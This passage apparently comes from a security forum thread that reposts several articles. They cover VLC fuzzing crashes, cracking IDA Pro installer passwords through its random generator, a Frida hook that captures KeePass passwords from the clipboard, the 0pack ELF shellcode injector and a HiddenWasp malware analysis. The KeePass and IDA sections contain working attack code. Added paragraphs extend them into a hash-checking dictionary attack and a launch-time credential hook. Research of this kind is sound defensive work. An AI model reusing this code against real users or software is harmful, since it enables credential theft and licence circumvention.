/home/symeon/Desktop/vlc/modules/codec/avcodec/video.c:435:13 #2 0x7f6f5ad13b89 in DecodeBlock /home/symeon/Desktop/vlc/modules/codec/avcodec/video.c:1259:17 #3 0x7f6f5ad0e537 in DecodeVideo /home/symeon/Desktop/vlc/modules/codec/avcodec/video.c:1356:12 4. Heap Out Of Bounds Read in mkv::demux_sys_t::FreeUnused() [0000611000069f40] mkv demux error: No tracks supported ================================================================= ==81972==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6020000482c0 at pc 0x7f0a692c7a37 bp 0x7f0a6bf2ac10 sp 0x7f0a6bf2ac08 READ of size 8 at 0x6020000482c0 thread T7 #0 0x7f0a692c7a36 in mkv::demux_sys_t::FreeUnused() /home/symeon/Desktop/vlc/modules/demux/mkv/demux.cpp:267:34 #1 0x7f0a6937eaf1 in mkv::Open(vlc_object_t*) /home/symeon/Desktop/vlc/modules/demux/mkv/mkv.cpp:257:12 #2 0x7f0a86792691 in demux_Probe /home/symeon/Desktop/vlc/src/input/demux.c:180:15 #3 0x7f0a866d8d17 in module_load /home/symeon/Desktop/vlc/src/modules/modules.c:122:15 5. 
Heap Out Of Bounds Read in mkv::matroska_segment_c::TrackInit

=================================================================
==83326==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6040000b3134 at pc 0x0000004ab6da bp 0x7ffb4f076250 sp 0x7ffb4f075a00
READ of size 13104 at 0x6040000b3134 thread T7
 #0 0x4ab6d9 in __asan_memcpy /home/symeon/Desktop/llvm-project/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cc:22:3
 #1 0x7ffb4d84008d in mkv::matroska_segment_c::TrackInit(mkv::mkv_track_t*)::TrackCodecHandlers::StringProcessor_1783_handler(char const*&, mkv::matroska_segment_c::TrackInit(mkv::mkv_track_t*)::HandlerPayload&) /home/symeon/Desktop/vlc/modules/demux/mkv/matroska_segment_parse.cpp:1807:25
 #2 0x7ffb4d83f6ab in mkv::matroska_segment_c::TrackInit(mkv::mkv_track_t*)::TrackCodecHandlers::StringProcessor_1783_callback(char const*, void*) /home/symeon/Desktop/vlc/modules/demux/mkv/matroska_segment_parse.cpp:1783:9
 #3 0x7ffb4d7dc486 in (anonymous namespace)::StringDispatcher::send(char const* const&, void* const&) const /home/symeon/Desktop/vlc/modules/demux/mkv/string_dispatcher.hpp:128:13

Note: Some of those bugs were also previously discovered and disclosed via the HackerOne Bug Bounty, and the rest of the bugs have not been addressed as of now.

Advanced fuzzing with libFuzzer

While searching for previous techniques, I stumbled upon this blog post, where one of the VLC developers used libFuzzer to get deeper coverage. The developer used, for example, vlc_stream_MemoryNew() (https://www.videolan.org/developers/vlc/doc/doxygen/html/stream__memory_8c.html), which reads data from a byte stream, and fuzzed the demux process. As expected, he managed to find a few interesting vulnerabilities. This proves that the more effort you put into writing your own harness and researching your target, the better results (and bugs) you will get!

Takeaways

We started with zero knowledge of how VLC works, and we've learnt how to create a very simple harness based on the documentation (which was unsuccessful). We nevertheless continued with instrumenting VLC with honggfuzz, and although the standard process of instrumenting the binary didn't work (hfuzz-clang), we were able to tweak the parameters a bit and successfully instrument the binary. We continued by gathering samples, compiling and linking VLC against the libhfuzz library to add coverage support, starting the fuzzing process, getting crashes and triaging them! We were then able to measure our initial coverage and improve our samples, increasing the overall coverage. Targeting only the .mkv format, we saw that we were able to get a total of 50% coverage of the mkv file format. Remember that VLC supports a number of different video and audio file formats – sure enough there is still a lot of code that can be fuzzed! Finally, although we used a relatively fast VM for this project, it should be noted that even a slow 4GB VM can be used and give you bugs!

Acknowledgements

This blog post would not be possible without guidance from @robertswiecki, helping with the compilation and linkage process, as well as giving me the tips and tricks described above in this guide. Finally, thanks @AlanMonie and @Yekki_1 for helping me with the fuzzing VM.

VideoLAN have issued an advisory.

Sursa: https://www.pentestpartners.com/security-blog/double-free-rce-in-vlc-a-honggfuzz-how-to/
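A side note on the sample-preparation step described in the write-up above: the mkvpropedit trick scales easily to a whole corpus. The sketch below simply repeats the command shown in the post for every .mkv sample; mkvpropedit is assumed to be on PATH, and the corpus/ directory and attachment.png file are placeholders for your own paths, not anything taken from the original article.

#!/usr/bin/env python3
# Batch-add an attachment to every .mkv sample in a corpus directory,
# mirroring the single mkvpropedit invocation shown above.
import subprocess
import sys
from pathlib import Path

CORPUS_DIR = Path("corpus")          # directory holding the .mkv samples (placeholder)
ATTACHMENT = Path("attachment.png")  # any small file to embed (placeholder)

def main() -> int:
    if not ATTACHMENT.is_file():
        print(f"attachment not found: {ATTACHMENT}", file=sys.stderr)
        return 1
    for sample in sorted(CORPUS_DIR.glob("*.mkv")):
        cmd = ["mkvpropedit", str(sample), "--add-attachment", str(ATTACHMENT)]
        result = subprocess.run(cmd, capture_output=True, text=True)
        status = "ok" if result.returncode == 0 else f"failed ({result.returncode})"
        print(f"{sample}: {status}")
    return 0

if __name__ == "__main__":
    sys.exit(main())

Feeding the modified samples back into honggfuzz should then exercise the ParseAttachments path that the coverage report showed as unreached.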
  16. Tech Editorials - Operation Crack: Hacking IDA Pro Installer PRNG from an Unusual Way

Advisory by Shaolin on 2019-06-21 | English Version | 中文版本 (Chinese version)

Introduction

Today, we are going to talk about the installation password of Hex-Rays IDA Pro, the most famous decompiler. What is an installation password? Generally, customers receive a custom installer and an installation password after they purchase IDA Pro, and the installation password is required during the installation process. However, if someday we find a leaked IDA Pro installer, is it still possible to install it without an installation password? This is an interesting topic. After brainstorming with our team members, we verified the answer: Yes! With a Linux or MacOS version installer, we can easily find the password directly. With a Windows version installer, we only need 10 minutes to calculate the password. The following is the detailed process:

* Linux and MacOS version

The first challenge is the Linux and MacOS version. The installer is built with an installer creation tool called InstallBuilder. We found the plaintext installation password directly in the program memory of the running IDA Pro installer. Mission complete! This problem was fixed after we reported it through Hex-Rays: BitRock released InstallBuilder 19.2.0, which protects the installation password, on 2019/02/11.

* Windows version

It gets harder with the Windows version because the installer is built with Inno Setup, which stores its password as a 160-bit SHA-1 hash. Therefore, we cannot get the password simply by statically or dynamically analyzing the installer, and brute force is clearly not an effective approach. But the situation is different if we can grasp the methodology of password generation, which lets us enumerate the passwords far more effectively!

Although we realized we needed to find out how Hex-Rays generates the passwords, this was still really difficult, as we did not know which language the random number generator is implemented in; there are at least 88 known random number generators, which is a huge space to cover. We first tried to find the charset used by the random number generator. We collected all leaked installation passwords, such as Hacking Team's passwords, which were leaked by WikiLeaks:

FgVQyXZY2XFk (link)
7ChFzSbF4aik (link)
ZFdLqEM2QMVe (link)
6VYGSyLguBfi (link)

From the collected passwords we can summarize the charset:

23456789ABCDEFGHJKLMPQRSTUVWXYZabcdefghijkmpqrstuvwxyz

The omission of 1, I, l, 0, O, o, N and n makes sense, because these are easily confused characters. Next, we guessed possible charset orderings like these:

23456789ABCDEFGHJKLMPQRSTUVWXYZabcdefghijkmpqrstuvwxyz
ABCDEFGHJKLMPQRSTUVWXYZ23456789abcdefghijkmpqrstuvwxyz
23456789abcdefghijkmpqrstuvwxyzABCDEFGHJKLMPQRSTUVWXYZ
abcdefghijkmpqrstuvwxyz23456789ABCDEFGHJKLMPQRSTUVWXYZ
abcdefghijkmpqrstuvwxyzABCDEFGHJKLMPQRSTUVWXYZ23456789
ABCDEFGHJKLMPQRSTUVWXYZabcdefghijkmpqrstuvwxyz23456789

Lastly, we picked some common languages (C/PHP/Python/Perl) to implement a random number generator and enumerate all the combinations. Then we examined whether the collected passwords appear in the combinations.
For example, here is a generator written in C:

#include <stdio.h>
#include <stdlib.h>

char _a[] = "23456789ABCDEFGHJKLMPQRSTUVWXYZabcdefghijkmpqrstuvwxyz";
char _b[] = "ABCDEFGHJKLMPQRSTUVWXYZ23456789abcdefghijkmpqrstuvwxyz";
char _c[] = "23456789abcdefghijkmpqrstuvwxyzABCDEFGHJKLMPQRSTUVWXYZ";
char _d[] = "abcdefghijkmpqrstuvwxyz23456789ABCDEFGHJKLMPQRSTUVWXYZ";
char _e[] = "abcdefghijkmpqrstuvwxyzABCDEFGHJKLMPQRSTUVWXYZ23456789";
char _f[] = "ABCDEFGHJKLMPQRSTUVWXYZabcdefghijkmpqrstuvwxyz23456789";

int main()
{
    char bufa[21]={0};
    char bufb[21]={0};
    char bufc[21]={0};
    char bufd[21]={0};
    char bufe[21]={0};
    char buff[21]={0};
    /* 64-bit counter so the loop actually terminates after seed 0xFFFFFFFF */
    unsigned long long i=0;
    while(i<0x100000000)
    {
        srand(i);
        for(size_t n=0;n<20;n++)
        {
            int key = rand() % 54;
            bufa[n]=_a[key];
            bufb[n]=_b[key];
            bufc[n]=_c[key];
            bufd[n]=_d[key];
            bufe[n]=_e[key];
            buff[n]=_f[key];
        }
        printf("%s\n",bufa);
        printf("%s\n",bufb);
        printf("%s\n",bufc);
        printf("%s\n",bufd);
        printf("%s\n",bufe);
        printf("%s\n",buff);
        i=i+1;
    }
}

After a month, we finally managed to generate the IDA Pro installation passwords with Perl, and the correct charset ordering is abcdefghijkmpqrstuvwxyzABCDEFGHJKLMPQRSTUVWXYZ23456789. For example, we can generate Hacking Team's leaked password FgVQyXZY2XFk with the following script:

#!/usr/bin/env perl
#
@_e = split //,"abcdefghijkmpqrstuvwxyzABCDEFGHJKLMPQRSTUVWXYZ23456789";
$i=3326487116;
srand($i);
$pw="";
# use a separate loop counter so $i still holds the seed when we print it
for($n=0;$n<12;++$n)
{
    $key = rand 54;
    $pw = $pw . $_e[$key];
}
print "$i $pw\n";

With this, we can build a dictionary of installation passwords, which greatly increases the efficiency of a brute-force attack. Generally, we can compute the password of one installer in 10 minutes. We have reported this issue to Hex-Rays, and they promised to harden the installation password immediately.

Summary

In this article, we discussed the possibility of installing IDA Pro without owning the installation password. In the end, we found the plaintext password in the program memory of the Linux and MacOS versions. For the Windows version, we determined the password generation methodology, so we can build a dictionary to accelerate the brute-force attack and recover one password in a reasonable time.

We really enjoyed this process: surmise wisely and prove it as best we can. It broadens our experience whether or not the result turns out to be correct, and this is why we took a whole month to verify such a difficult surmise. We take the same attitude in our Red Team Assessments; you would love to give it a try!

Lastly, we would like to thank Hex-Rays for their friendly and rapid response. Although this issue is not covered by their Security Bug Bounty Program, they still generously awarded us IDA Pro for Linux and Mac, and upgraded the Windows version for us. We really appreciate it.

Timeline
Jan 31, 2019 - Report to Hex-Rays
Feb 01, 2019 - Hex-Rays promised to harden the installation password and reported to BitRock
Feb 11, 2019 - BitRock released InstallBuilder 19.2.0

Sursa: https://devco.re/blog/2019/06/21/operation-crack-hacking-IDA-Pro-installer-PRNG-from-an-unusual-way-en/
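To turn the generator above into a working dictionary attack, the missing piece is checking each candidate against the hash stored in the installer. The sketch below is only an outline and makes two assumptions that are not from the article: that you have already extracted the SHA-1 digest and salt from the Inno Setup installer, and that Inno Setup hashes the string "PasswordCheckHash" followed by the salt and the password bytes (verify this against the Inno Setup source before relying on it). The candidates.txt wordlist is assumed to be the output of the Perl script.

#!/usr/bin/env python3
# Check generated password candidates against an Inno Setup style SHA-1 hash.
# TARGET_SHA1 and SALT are placeholders; the exact "PasswordCheckHash" + salt
# construction is an assumption to verify against the Inno Setup source.
import hashlib

TARGET_SHA1 = "0123456789abcdef0123456789abcdef01234567"  # placeholder digest from the installer
SALT = bytes.fromhex("00112233445566778899")               # placeholder salt from the installer

def candidate_hash(password: str, salt: bytes) -> str:
    data = b"PasswordCheckHash" + salt + password.encode("utf-8")
    return hashlib.sha1(data).hexdigest()

def main() -> None:
    with open("candidates.txt", "r", encoding="utf-8") as wordlist:
        for line in wordlist:
            parts = line.split()
            if not parts:
                continue
            candidate = parts[-1]  # the Perl script prints "<seed> <password>"
            if candidate_hash(candidate, SALT) == TARGET_SHA1:
                print(f"[+] password found: {candidate}")
                return
    print("[-] no candidate matched")

if __name__ == "__main__":
    main()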
  17. I don't know what that CTI is about, but I've written a few things here; I hope it helps:
  18. #HITB2019AMS conference talk recordings (Hack In The Box Security Conference):

#HITB2019AMS PRECONF PREVIEW - The End Is The Beginning Is The End: Ten Years In The NL Box
#HITB2019AMS PRECONF PREVIEW - The Beginning of the End? A Return to the Abyss for a Quick Look
#HITB2019AMS KEYNOTE: The End Is The Beginning Is The End: Ten Years In The NL Box - D. Kannabhiran
#HITB2019AMS D1T1 - Make ARM Shellcode Great Again - Saumil Shah
#HITB2019AMS D1T2 - Hourglass Fuzz: A Quick Bug Hunting Method - M. Li, T. Han, L. Jiang and L. Wu
#HITB2019AMS D1T1 - TOCTOU Attacks Against Secure Boot And BootGuard - Trammell Hudson & Peter Bosch
#HITB2019AMS D1T2 - Hidden Agendas: Bypassing GSMA Recommendations On SS7 Networks - Kirill Puzankov
#HITB2019AMS D1T1 - Finding Vulnerabilities In iOS/MacOS Networking Code - Kevin Backhouse
#HITB2019AMS D1T2 - fn_fuzzy: Fast Multiple Binary Diffing Triage With IDA - Takahiro Haruyama
#HITB2019AMS D1T3 - How To Dump, Parse, And Analyze i.MX Flash Memory Chips - Damien Cauquil
#HITB2019AMS D1T1 - The Birdman: Hacking Cospas-Sarsat Satellites - Hao Jingli
#HITB2019AMS D1T2 - Duplicating Black Box Machine Learning Models - Rewanth Cool and Nikhil Joshi
#HITB2019AMS D1T3 - Overcoming Fear: Reversing With Radare2 - Arnau Gamez Montolio
#HITB2019AMS D1T1 - Deobfuscate UEFI/BIOS Malware And Virtualized Packers - Alexandre Borges
#HITB2019AMS D1T2 - Researching New Attack Interfaces On iOS And OSX - Lilang Wu and Moony Li
#HITB2019AMS D1T1 - A Successful Mess Between Hardening And Mitigation - Weichselbaum & Spagnuolo
#HITB2019AMS D1T2 - For The Win: The Art Of The Windows Kernel Fuzzing - Guangming Liu
#HITB2019AMS D1T3 - Attacking GSM - Alarms, Smart Homes, Smart Watches And More - Alex Kolchanov
#HITB2019AMS D1T1 - SeasCoASA: Exploiting A Small Leak In A Great Ship - Kaiyi Xu and Lily Tang
#HITB2019AMS D1T2 - H(ack)DMI: Pwning HDMI For Fun And Profit - Jeonghoon Shin and Changhyeon Moon
#HITB2019AMS D1T1 - Pwning Centrally-Controlled Smart Homes - Sanghyun Park and Seongjoon Cho
#HITB2019AMS D1T2 - Automated Discovery Of Logical Priv. Esc. Bugs In Win10 - Wenxu Wu and Shi Qin

Sursa:
  19. Fun With Frida

By James, Jun 2

In this post, we're going to take a quick look at Frida and use it to steal credentials from KeePass. According to their website, Frida is a "dynamic instrumentation framework". Essentially, it allows us to inject into a running process and then interact with that process via JavaScript. It's commonly used for mobile app testing, but is supported on Windows, OSX and *nix as well.

KeePass is a free and open-source password manager with official builds for Windows, but unofficial releases exist for most Linux flavors. We are going to look at the latest official Windows version 2 release (2.42.1). To follow along, you will need Frida, KeePass and Visual Studio (or any other editor you want to load a .NET project in). You will also need the KeePass source from https://keepass.info/download.html

The first step is figuring out what we want to achieve. Like most password managers, KeePass protects stored credentials with a master password. This password is entered by the user and allows the KeePass database to be accessed. Once unlocked, usernames and passwords can be copied to the clipboard to allow them to be entered. Given that password managers allow the easy use of strong passwords, it's a fairly safe assumption that users will be copying and pasting passwords. Let's take a look at how KeePass interacts with the clipboard.

After a bit of digging (hint: the search tool is your friend), we find some references to the "SetClipboardData" Windows API call. It looks like KeePass is calling the native Windows API directly to manage the clipboard. Looking at which calls reference this method, we find one reference within the ClipboardUtil.Windows.cs class. It looks like the "SetDataW" method is how KeePass interacts with the clipboard.

private static bool SetDataW(uint uFormat, byte[] pbData)
{
    UIntPtr pSize = new UIntPtr((uint)pbData.Length);
    IntPtr h = NativeMethods.GlobalAlloc(NativeMethods.GHND, pSize);
    if(h == IntPtr.Zero) { Debug.Assert(false); return false; }

    Debug.Assert(NativeMethods.GlobalSize(h).ToUInt64() >=
        (ulong)pbData.Length); // Might be larger

    IntPtr pMem = NativeMethods.GlobalLock(h);
    if(pMem == IntPtr.Zero)
    {
        Debug.Assert(false);
        NativeMethods.GlobalFree(h);
        return false;
    }

    Marshal.Copy(pbData, 0, pMem, pbData.Length);
    NativeMethods.GlobalUnlock(h); // May return false on success

    if(NativeMethods.SetClipboardData(uFormat, h) == IntPtr.Zero)
    {
        Debug.Assert(false);
        NativeMethods.GlobalFree(h);
        return false;
    }

    return true;
}

This code uses native method calls to allocate some memory, writes the supplied pbData byte array to that location and then calls the SetClipboardData API, passing a handle to the memory containing the contents of pbData. To confirm this is the code we want to target, we can add a breakpoint and debug the app. Before we can build the solution, we need to fix up the signing key. The easiest way is just to disable signing for the KeePass and KeePassLib projects (Right click -> Properties -> Signing -> uncheck "Sign the assembly" -> save). With our breakpoint set we can run KeePass, open a database and copy a credential (right click -> copy password). Our breakpoint is hit and we can inspect the value of pbData. If you get a build error, double check you have disabled signing and try again.

In this case, the copied password was "AABBCCDD", which matches the bytes shown. We can confirm this by adding a bit of code to the method and re-running our test.
var str = System.Text.Encoding.Default.GetString(pbData);

This will convert the pbData byte array to a string, which we can inspect with the debugger. This looks like a good method to target, as the app only calls the SetClipboardData native API in one place (meaning we shouldn't need to filter out any calls we don't care about).

Time to fire up Frida. Before we get into hooking the KeePass application, we need a way to inject Frida. For this example, we are going to use a simple Python 3 script.

import frida
import sys
import codecs

def on_message(message, data):
    if message['type'] == 'send':
        print(message['payload'])
    elif message['type'] == 'error':
        print(message['stack'])
    else:
        print(message)

try:
    session = frida.attach("KeePass.exe")
    print("[+] Process Attached")
except Exception as e:
    print(f"Error => {e}")
    sys.exit(0)

with codecs.open('./Inject.js', 'r', 'utf-8') as f:
    source = f.read()

script = session.create_script(source)
script.on('message', on_message)
script.load()

try:
    while True:
        pass
except KeyboardInterrupt:
    session.detach()
    sys.exit(0)

This looks complicated, but doesn't actually do that much. The interesting part happens inside the try/except block. We attempt to attach to the "KeePass.exe" process, then inject a .js file containing our code to interact with the process and set up messaging. The "on_message" function allows messages to be received from the target process, which we just print to the console. This code is basically generic, so you can re-use it for any other process you want to target.

Our code to interact with the process will be written in the "Inject.js" file. First, we need to grab a reference to the SetClipboardData API.

var user32_SetClipboardData = Module.findExportByName("user32.dll", "SetClipboardData")

We can then attach to this call, which sets up our hook.

// Attach a hook to the native pointer
Interceptor.attach(user32_SetClipboardData, {
    onEnter: function (args, state) {
        console.log("[+] KeePass called SetClipboardData");
    },
    onLeave: function (retval) {
    }
});

The "onEnter" method is called as the target process calls SetClipboardData. onLeave, as you might expect, is called just before the hooked method returns. I've added a simple console.log call to the onEnter function, which will let us test our hook and make sure we aren't getting any erroneous API calls showing up.

With KeePass.exe running (you can use the official released binary now, no need to run the debug version from Visual Studio), run the Python script. You should see the "[+] Process Attached" message. Unlock KeePass and copy a credential. You should see the "KeePass called SetClipboardData" message. KeePass, by default, clears the clipboard after 12 seconds. You will see another "KeePass called SetClipboardData" message when this occurs. We can strip that out later.

Looking at the SetClipboardData API documentation, we can see that two parameters are passed: a format value and a handle. The handle is essentially a pointer to the memory address containing the data to add to the clipboard. For this example, we can safely ignore the format value (this is used to specify the type of data to be added to the clipboard). KeePass uses one of two format values; I'll leave it as an exercise for the reader to modify the PoC to support both formats fully. The main thing we need to know is that the second argument is the memory address we want to access. In Frida, we gain access to arguments passed to hooked methods via the "args" array.
We can then use the Frida API to read data from the address passed to hMem.

// Get native pointer to SetClipboardData
var user32_SetClipboardData = Module.findExportByName("user32.dll", "SetClipboardData")

// Attach a hook to the native pointer
Interceptor.attach(user32_SetClipboardData, {
    onEnter: function (args, state) {
        console.log("[+] KeePass called SetClipboardData");
        var ptr = args[1].readPointer().readByteArray(32);
        console.log(ptr)
    },
    onLeave: function (retval) {
    }
});

Here we call readPointer() on args[1], then read a byte array from it. Note that the call to readByteArray() requires a length value, which we don't have. While it should be possible to grab this from other calls, we can sidestep this complexity by simply reading a set number of bytes. This may be a slightly naive approach, but it's sufficient for our purposes.

Kill the Python script and re-run it (you don't need to restart KeePass). Copy some data and you should see the byte array written to the console. Frida automatically formats the byte array for us. We can see the password "AABBCCDD" being set on the clipboard, followed by "--" 12 seconds later. This is the string KeePass uses to overwrite the clipboard data.

This is enough information to flesh out our PoC. We can convert the byte array to a string, then check if the string starts with "--" to remove the data when KeePass clears the clipboard. Note that this is, again, a fairly naive approach and introduces an obvious bug where a password starting with "--" would not be captured. Another exercise for the reader! This gives us our complete PoC.

// Get native pointer to SetClipboardData
var user32_SetClipboardData = Module.findExportByName("user32.dll", "SetClipboardData")

// Attach a hook to the native pointer
Interceptor.attach(user32_SetClipboardData, {
    onEnter: function (args, state) {
        console.log("[+] KeePass called SetClipboardData");
        var ptr = args[1].readPointer().readByteArray(32);
        var str = ab2str(ptr);
        if(!str.startsWith("--")){
            console.log("[+] Captured Data!")
            console.log(str);
        }
        else{
            console.log("[+] Clipboard was cleared")
        }
    },
    onLeave: function (retval) {
    }
});

function ab2str(buf){
    return String.fromCharCode.apply(null, new Uint16Array(buf));
}

The ab2str function converts a byte array to a string; the rest should be self-explanatory. If we run this PoC we should see the captured password and a message telling us the clipboard was cleared.

That's all for this post. There is obviously some work to do before we could use this on an engagement, but we can see how powerful Frida can be. It's worth noting that you do not need any privileges to inject into the KeePass process; all the examples were run with KeePass and CMD running as a standard user.

James - Purveyor of fine, handcrafted, artisanal cybers.

Sursa: https://medium.com/@two06/fun-with-frida-5d0f55dd331a
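One practical tweak to the loader script in the post above: attaching to an already-running KeePass instance means anything copied before the injection is missed. Frida's Python bindings can also spawn the target suspended, inject, and then resume it, so the hook is active from the very first clipboard operation. The sketch below reuses the same Inject.js; the KeePass install path is a placeholder and not taken from the original post.

import frida
import sys
import codecs

# Spawn KeePass suspended, inject Inject.js, then resume it so the hook is in
# place before the user can copy anything. The install path is a placeholder.
KEEPASS_PATH = r"C:\Program Files (x86)\KeePass Password Safe 2\KeePass.exe"

def on_message(message, data):
    if message["type"] == "send":
        print(message["payload"])
    elif message["type"] == "error":
        print(message["stack"])

pid = frida.spawn([KEEPASS_PATH])
session = frida.attach(pid)

with codecs.open("./Inject.js", "r", "utf-8") as f:
    script = session.create_script(f.read())

script.on("message", on_message)
script.load()
frida.resume(pid)

try:
    sys.stdin.read()  # keep the injector alive until Ctrl+C / EOF
except KeyboardInterrupt:
    session.detach()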
  20. 0pack
Description

An ELF x64 binary payload injector written in C++ using the LIEF library. It injects shellcode written in fasm as relocations into the header. Execution begins at entrypoint 0, a.k.a. the header, which confuses or downright breaks debuggers. The whole first segment is rwx; this can be mitigated at runtime through an injected payload which sets the binary's segment to just rx.

Compiler flags

The targeted binary must be built with the following flags:

gcc -m64 -fPIE -pie

Static linking is not possible, as -pie and -static are incompatible flags. Or in other terms: -static means a statically linked executable with no dynamic relocations and only PT_LOAD segments, while -pie means a shared library with dynamic relocations and PT_INTERP and PT_DYNAMIC segments.

Presentation links

HTML: https://luis-hebendanz.github.io/0pack/
PDF: https://github.com/Luis-Hebendanz/0pack/raw/master/0pack-presentation.pdf
Video: https://github.com/Luis-Hebendanz/0pack/raw/master/html/showcase_video.webm

Debugger behaviour

Debuggers don't generally like 0 as the entrypoint, and oftentimes it is impossible to set breakpoints in the header area. Another issue that often occurs is that the entry0 label gets set incorrectly to the main label, which means the attacker can purposely mislead the reverse engineer into reverse engineering fake code by jumping over the main method. Executing db entry0 in radare2 has this behaviour.

Affected debuggers

radare2
Hopper
gdb
IDA Pro --> Not tested

0pack help

Injects shellcode as relocations into an ELF binary
Usage: 0pack [OPTION...]
  -d, --debug            Enable debugging
  -i, --input arg        Input file path. Required.
  -p, --payload arg      Fasm payload path.
  -b, --bin_payload arg  Binary payload path.
  -o, --output arg       Output file path. Required.
  -s, --strip            Strip the binary. Optional.

-b, --bin_payload: reads a binary file and converts it to ELF relocations. 0pack appends to the binary payload a jmp to the original entrypoint.

-p, --payload: needs a fasm payload; 0pack prepends and appends a "push/pop all registers" and a jmp to the original entrypoint to the payload.

Remarks

Although I used the LIEF library to accomplish this task, I wouldn't encourage using it. It is very inconsistent and opaque in what it is doing, and oftentimes the library is downright broken. I did not find a working library for x64 PIE-enabled ELF binaries. If someone has suggestions, feel free to email me at: luis.nixos@gmail.com

Dependencies

cmake version 3.12.2 or higher
build-essential
gcc
fasm

Use build script

$ ./build.sh

Build it manually

$ mkdir build
$ cd build
$ cmake ..
$ make
$ ./../main.elf

Sursa: https://github.com/Luis-Hebendanz/0pack
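A quick way to spot a binary processed by a packer like this is to read e_entry straight out of the ELF header, since 0pack reportedly leaves the entrypoint at 0. The sketch below is not part of the 0pack tooling; it is a minimal standalone check that assumes a 64-bit little-endian ELF.

#!/usr/bin/env python3
# Print the entrypoint of a 64-bit little-endian ELF.
# An e_entry of 0 matches the "execution begins at the header" trick above.
# Usage: python3 check_entry.py ./some_binary
import struct
import sys

def elf64_entry(path: str) -> int:
    with open(path, "rb") as f:
        header = f.read(64)                      # the ELF64 header is 64 bytes
    if len(header) < 64 or header[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    if header[4] != 2 or header[5] != 1:         # EI_CLASS=ELFCLASS64, EI_DATA=little-endian
        raise ValueError("only 64-bit little-endian ELF files are handled here")
    return struct.unpack_from("<Q", header, 24)[0]   # e_entry sits at offset 24

if __name__ == "__main__":
    entry = elf64_entry(sys.argv[1])
    flag = "  <- suspicious (entrypoint 0)" if entry == 0 else ""
    print(f"e_entry = {entry:#x}{flag}")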
  21. HiddenWasp Malware Stings Targeted Linux Systems Ignacio Sanmillan 29.05.19 | 1:36 pm Share: Overview • Intezer has discovered a new, sophisticated malware that we have named “HiddenWasp”, targeting Linux systems. • The malware is still active and has a zero-detection rate in all major anti-virus systems. • Unlike common Linux malware, HiddenWasp is not focused on crypto-mining or DDoS activity. It is a trojan purely used for targeted remote control. • Evidence shows in high probability that the malware is used in targeted attacks for victims who are already under the attacker’s control, or have gone through a heavy reconnaissance. • HiddenWasp authors have adopted a large amount of code from various publicly available open-source malware, such as Mirai and the Azazel rootkit. In addition, there are some similarities between this malware and other Chinese malware families, however the attribution is made with low confidence. • We have detailed our recommendations for preventing and responding to this threat. 1. Introduction Although the Linux threat ecosystem is crowded with IoT DDoS botnets and crypto-mining malware, it is not very common to spot trojans or backdoors in the wild. Unlike Windows malware, Linux malware authors do not seem to invest too much effort writing their implants. In an open-source ecosystem there is a high ratio of publicly available code that can be copied and adapted by attackers. In addition, Anti-Virus solutions for Linux tend to not be as resilient as in other platforms. Therefore, threat actors targeting Linux systems are less concerned about implementing excessive evasion techniques since even when reusing extensive amounts of code, threats can relatively manage to stay under the radar. Nevertheless, malware with strong evasion techniques do exist for the Linux platform. There is also a high ratio of publicly available open-source malware that utilize strong evasion techniques and can be easily adapted by attackers. We believe this fact is alarming for the security community since many implants today have very low detection rates, making these threats difficult to detect and respond to. We have discovered further undetected Linux malware that appear to be enforcing advanced evasion techniques with the use of rootkits to leverage trojan-based implants. In this blog we will present a technical analysis of each of the different components that this new malware, HiddenWasp, is composed of. We will also highlight interesting code-reuse connections that we have observed to several open-source malware. The following images are screenshots from VirusTotal of the newer undetected malware samples discovered: 2. Technical Analysis When we came across these samples we noticed that the majority of their code was unique: Similar to the recent Winnti Linux variants reported by Chronicle, the infrastructure of this malware is composed of a user-mode rootkit, a trojan and an initial deployment script. We will cover each of the three components in this post, analyzing them and their interactions with one another. 2.1 Initial Deployment Script: When we spotted these undetected files in VirusTotal it seemed that among the uploaded artifacts there was a bash script along with a trojan implant binary. We observed that these files were uploaded to VirusTotal using a path containing the name of a Chinese-based forensics company known as Shen Zhou Wang Yun Information Technology Co., Ltd. 
Furthermore, the malware implants seem to be hosted in servers from a physical server hosting company known as ThinkDream located in Hong Kong. Among the uploaded files, we observed that one of the files was a bash script meant to deploy the malware itself into a given compromised system, although it appears to be for testing purposes: Thanks to this file we were able to download further artifacts not present in VirusTotal related to this campaign. This script will start by defining a set of variables that would be used throughout the script. Among these variables we can spot the credentials of a user named ‘sftp’, including its hardcoded password. This user seems to be created as a means to provide initial persistence to the compromised system: Furthermore, after the system’s user account has been created, the script proceeds to clean the system as a means to update older variants if the system was already compromised: The script will then proceed to download a tar compressed archive from a download server according to the architecture of the compromised system. This tarball will contain all of the components from the malware, containing the rootkit, the trojan and an initial deployment script: After malware components have been installed, the script will then proceed to execute the trojan: We can see that the main trojan binary is executed, the rootkit is added to LD_PRELOAD path and another series of environment variables are set such as the ‘I_AM_HIDDEN’. We will cover throughout this post what the role of this environment variable is. To finalize, the script attempts to install reboot persistence for the trojan binary by adding it to /etc/rc.local. Within this script we were able to observe that the main implants were downloaded in the form of tarballs. As previously mentioned, each tarball contains the main trojan, the rootkit and a deployment script for x86 and x86_64 builds accordingly. The deployment script has interesting insights of further features that the malware implements, such as the introduction of a new environment variable ‘HIDE_THIS_SHELL’: We found some of the environment variables used in a open-source rootkit known as Azazel. It seems that this actor changed the default environment variable from Azazel, that one being HIDE_THIS_SHELL for I_AM_HIDDEN. We have based this conclusion on the fact that the environment variable HIDE_THIS_SHELL was not used throughout the rest of the components of the malware and it seems to be residual remains from Azazel original code. The majority of the code from the rootkit implants involved in this malware infrastructure are noticeably different from the original Azazel project. Winnti Linux variants are also known to have reused code from this open-source project. 2.2 The Rootkit: The rootkit is a user-space based rootkit enforced via LD_PRELOAD linux mechanism. It is delivered in the form of an ET_DYN stripped ELF binary. This shared object has an DT_INIT dynamic entry. The value held by this entry is an address that will be executed once the shared object gets loaded by a given process: Within this function we can see that eventually control flow falls into a function in charge to resolve a set of dynamic imports, which are the functions it will later hook, alongside with decoding a series of strings needed for the rootkit operations. We can see that for each string it allocates a new dynamic buffer, it copies the string to it to then decode it. 
